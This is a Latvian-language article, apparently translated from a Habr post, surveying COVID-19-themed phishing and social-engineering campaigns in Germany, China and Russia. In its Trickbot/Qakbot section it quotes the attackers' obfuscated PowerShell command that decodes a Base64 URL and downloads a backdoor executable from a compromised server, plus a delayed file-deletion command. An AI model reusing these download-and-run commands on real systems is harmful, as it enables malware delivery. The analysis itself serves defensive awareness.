Koronavīrusa kiberuzbrukumi: visa būtība ir sociālajā inženierijā

Uzbrucēji turpina izmantot COVID-19 tēmu, radot arvien vairāk apdraudējumu lietotājiem, kurus ļoti interesē viss, kas saistīts ar epidēmiju. IN pēdējais ieraksts Mēs jau runājām par to, kāda veida ļaunprogrammatūra parādījās pēc koronavīrusa, un šodien mēs runāsim par sociālās inženierijas paņēmieniem, ar kuriem lietotāji dažādās valstīs, tostarp Krievijā, jau ir saskārušies. Vispārīgās tendences un piemēri ir zem griezuma.

Atceries iekšā pēdējo reizi Runājām par to, ka cilvēki ir gatavi lasīt ne tikai par koronavīrusu un epidēmijas gaitu, bet arī par finansiālā atbalsta pasākumiem? Šeit ir labs piemērs. Interesants pikšķerēšanas uzbrukums tika atklāts Vācijas Ziemeļreinas-Vestfālenes štatā jeb NRW. Uzbrucēji izveidoja Ekonomikas ministrijas vietnes (NRW Ekonomikas ministrija), kur ikviens var pieteikties finansiālai palīdzībai. Šāda programma patiešām pastāv, un tā izrādījās izdevīga krāpniekiem. Saņēmuši savu upuru personas datus, viņi reālajā ministrijas mājaslapā vērsās pie iesnieguma, bet norādīja citus bankas rekvizītus. Pēc oficiālajiem datiem, līdz shēmas atklāšanai tika veikti 4 tūkstoši šādu viltus pieprasījumu. Rezultātā krāpnieku rokās nonāca 109 miljoni dolāru, kas bija paredzēti cietušajiem pilsoņiem.

Vai vēlaties veikt bezmaksas COVID-19 testu?

Vēl viens nozīmīgs ar koronavīrusu saistīts pikšķerēšanas piemērs bija atklāts e-pastos. Ziņojumi piesaistīja lietotāju uzmanību ar piedāvājumu veikt bezmaksas koronavīrusa infekcijas pārbaudi. Šo pielikumā vēstules bija Trickbot/Qakbot/Qbot gadījumi. Un, kad tie, kas vēlējās pārbaudīt savu veselību, sāka “aizpildīt pievienoto veidlapu”, datorā tika lejupielādēts ļaunprātīgs skripts. Un, lai izvairītos no smilškastes testēšanas, skripts galveno vīrusu sāka lejupielādēt tikai pēc kāda laika, kad aizsardzības sistēmas bija pārliecinātas, ka nekādas ļaunprātīgas darbības nenotiks.

Arī lielāko daļu lietotāju bija viegli pārliecināt iespējot makro. Lai to izdarītu, tika izmantots standarta triks: lai aizpildītu anketu, vispirms ir jāiespējo makro, kas nozīmē, ka jums ir jāpalaiž VBA skripts.

Kā redzat, VBA skripts ir īpaši maskēts no antivīrusiem.

Sistēmā Windows ir gaidīšanas funkcija, kurā lietojumprogramma gaida /T <sekundes>, pirms pieņem noklusējuma atbildi “Jā”. Mūsu gadījumā skripts gaidīja 65 sekundes pirms pagaidu failu dzēšanas:

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt

Un, gaidot, tika lejupielādēta ļaunprātīga programmatūra. Šim nolūkam tika palaists īpašs PowerShell skripts:

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt

Pēc Base64 vērtības atkodēšanas PowerShell skripts no Vācijas lejupielādē aizmugures durvis, kas atrodas iepriekš uzlauztajā tīmekļa serverī:

http://automatischer-staubsauger.com/feature/777777.png

un saglabā to ar nosaukumu:

C:UsersPublictmpdirfile1.exe

Mape ‘C:UsersPublictmpdir’ tiek dzēsts, palaižot failu 'tmps1.bat', kas satur komandu cmd /c mkdir ""C:UsersPublictmpdir"".

Mērķtiecīgs uzbrukums valsts aģentūrām

Turklāt FireEye analītiķi nesen ziņoja par mērķtiecīgu APT32 uzbrukumu, kas bija vērsts pret valdības struktūrām Uhaņā, kā arī Ķīnas Ārkārtas situāciju pārvaldības ministriju. Vienā no izplatītajiem RTF bija saite uz New York Times rakstu ar nosaukumu Koronavīrusa tiešraides atjauninājumi: Ķīna izseko ceļotājus no Hubei. Tomēr, to izlasot, tika lejupielādēta ļaunprātīga programmatūra (FireEye analītiķi identificēja gadījumu kā METALJACK).

Interesanti, ka atklāšanas brīdī neviens no antivīrusiem šo gadījumu neatklāja, norāda Virustotal.

Kad oficiālās vietnes nedarbojas

Visspilgtākais pikšķerēšanas uzbrukuma piemērs notika Krievijā tikai otro dienu. Iemesls tam bija ilgi gaidītā pabalsta noteikšana bērniem vecumā no 3 līdz 16 gadiem. Kad 12. gada 2020. maijā tika paziņots par pieteikumu pieņemšanas sākumu, miljoni steidzās uz Valsts dienesta vietni pēc ilgi gaidītās palīdzības un nogāza portālu ne sliktāk kā profesionāls DDoS uzbrukums. Kad prezidents teica, ka “Valsts dienesti nevar tikt galā ar pieteikumu plūsmu”, cilvēki tiešsaistē sāka runāt par alternatīvas pieteikumu pieņemšanas vietnes izveidi.

Problēma ir tā, ka vairākas vietnes sāka darboties vienlaikus, un viena, īstā vietnē posobie16.gosuslugi.ru, faktiski pieņem pieteikumus, desmitiem vāc lētticīgu lietotāju personas datus.

Kolēģi no SearchInform atrada aptuveni 30 jaunus krāpnieciskus domēnus .ru zonā. Infosecurity un Softline Company kopš aprīļa sākuma ir izsekojuši vairāk nekā 70 līdzīgu viltotu valdības dienestu vietņu. To veidotāji manipulē ar pazīstamiem simboliem un izmanto arī vārdu gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie un tā tālāk kombinācijas.

Hype un sociālā inženierija

Visi šie piemēri tikai apstiprina, ka uzbrucēji veiksmīgi gūst peļņu no koronavīrusa tēmas. Un jo lielāka ir sociālā spriedze un neskaidrāku jautājumu, jo lielāka iespēja krāpniekiem nozagt svarīgus datus, piespiest cilvēkus pašiem atteikties no savas naudas vai vienkārši uzlauzt vairāk datoru.

Un, ņemot vērā to, ka pandēmija ir piespiedusi potenciāli nesagatavotus cilvēkus masveidā strādāt no mājām, apdraudēti ir ne tikai personiskie, bet arī korporatīvie dati. Piemēram, nesen pikšķerēšanas uzbrukumam tika pakļauti arī Microsoft 365 (agrāk Office 365) lietotāji. Cilvēki saņēma milzīgus “neatbildētos” balss ziņojumus kā vēstuļu pielikumus. Tomēr faili patiesībā bija HTML lapa, uz kuru tika nosūtīti uzbrukuma upuri viltota Microsoft 365 pierakstīšanās lapa. Tā rezultātā tiek zaudēta piekļuve un visi konta dati tiek apdraudēti.

Avots: www.habr.com